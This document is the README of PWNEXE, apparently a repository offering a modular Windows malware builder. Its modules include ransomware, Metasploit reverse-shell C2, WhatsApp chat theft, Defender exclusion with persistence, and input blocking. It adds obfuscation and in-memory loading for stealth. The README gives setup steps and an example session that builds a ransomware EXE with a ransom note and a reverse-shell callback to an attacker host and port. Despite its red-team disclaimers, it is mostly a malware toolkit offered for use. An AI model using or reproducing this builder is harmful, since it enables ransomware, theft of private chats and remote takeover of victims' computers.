- New Module:
daemon/chatwipe- WhatsApp chat extractor that automatically extracts the chats from a user's WhatsApp Web session in Google Chrome - Features:
- Automatically detects Chrome installation and WhatsApp Web login
- Extracts both incoming and outgoing messages with timestamps
PWNEXE is a modular Windows malware generation framework. It empowers security researchers and red teamers to rapidly build custom malware payloads by chaining together a variety of modules—such as ransomware, persistence loaders, C2 servers, and more—into a single executable. PWNEXE is designed for advanced adversary simulation, malware research, and authorized red team operations.
Warning: This tool is for educational and authorized security research only. Misuse may be illegal and unethical.
- Modular Payloads: Chain multiple modules (ransomware, persistence, C2, etc.) into a single EXE.
- Customizable Options: Configure module and build options (e.g., ransom note, C2 port, EXE name).
- In-Memory Execution: Optional Rust loader for stealthy, in-memory payload delivery.
- Obfuscation Support: Optional payload obfuscation via LLVM and Rust.
- Cross-Platform Build: Uses Go and Rust for robust Windows payloads.
- Fast Build Pipeline: Output is saved to the
.LOOTdirectory.
- Clone the repository:
git clone https://github.com/sarwaaaar/PWNEXE.git cd PWNEXE - Install Python 3.8+
python3 --version
- Install system dependencies:
- Go (for module compilation)
- Rust (for in-memory loader)
- Docker (required for payload obfuscation)
- Pull the required Docker image for obfuscation:
docker pull ghcr.io/joaovarelas/obfuscator-llvm-16.0:latest
- This image is used to obfuscate Rust payloads using LLVM during the build process.
- Pull the required Docker image for obfuscation:
- On macOS:
brew install go rust
- On Linux:
sudo apt install golang rustc cargo
Start the tool:
python3 main.pyuse <module>— Add a module to the build chainset <OPTION> <VALUE>— Set build/module optionsshow modules— List available modulesshow options— Show current build/module optionsbuild— Build the final EXE payloadclear— Clear selected modulesdelete— Remove a module from the chainexit— Exit the tool
For detailed documentation on each command and advanced usage, see the PWNEXE Wiki.
> show modules
> use daemon/bartmoss
> set NOTE "Your files have been encrypted! Contact evil@domain.com."
> use daemon/spider
> set LHOST 192.168.1.10
> set LPORT 4444
> build
- The final EXE will be saved in the
.LOOTdirectory.
| Module | Description |
|---|---|
| daemon/filedaemon | Normal C2 server to receive data |
| daemon/spider | Metasploit C2 server (reverse shell/payload delivery) |
| daemon/bartmoss | Ransomware builder |
| daemon/chatwipe | WhatsApp chat extractor |
| interfaceplug/blackout | Screen blackout utility |
| interfaceplug/suicide | Block input (DoS) |
| quickhack/ping | Sends back user info to the C2 server |
| quickhack/icepick | Adds EXE to persistence and adds exclusion to Windows Defender |
- Module Chaining: Combine multiple behaviors in one payload.
- Custom Build Options: Set EXE name, enable obfuscation, etc.
- In-Memory Execution: Use Rust loader for stealthy delivery.
PWNEXE is intended for educational purposes and authorized security testing only. You must have explicit permission to use this tool against any system or network. The authors and contributors are not responsible for misuse, damage, or legal consequences. Always follow applicable laws and ethical guidelines.
Contributions are welcome! Please fork the repository, create a feature branch, and submit a pull request with a detailed description of your changes.
MIT License. See the LICENSE file for details.